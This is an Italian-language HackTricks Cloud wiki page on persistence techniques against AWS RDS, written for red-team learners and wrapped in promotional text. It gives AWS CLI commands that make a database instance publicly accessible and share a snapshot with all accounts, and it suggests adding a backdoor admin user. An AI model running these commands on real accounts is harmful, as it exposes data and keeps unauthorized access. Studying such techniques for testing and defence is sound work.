HackTricks CloudAWS - RDS Persistence
Reading time: 2 minutes
tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
RDS
Per maggiori informazioni, vedi:
AWS - Relational Database (RDS) Enum
Rendere l'istanza accessibile pubblicamente: rds:ModifyDBInstance
Un attacker con questa autorizzazione può modificare un'istanza RDS esistente per abilitare l'accessibilità pubblica.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Crea un utente admin all'interno del DB
Un attacker potrebbe semplicemente creare un utente all'interno del DB così, anche se la password dell'utente master viene modificata, non perde l'accesso al database.
Rendi lo snapshot pubblico
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.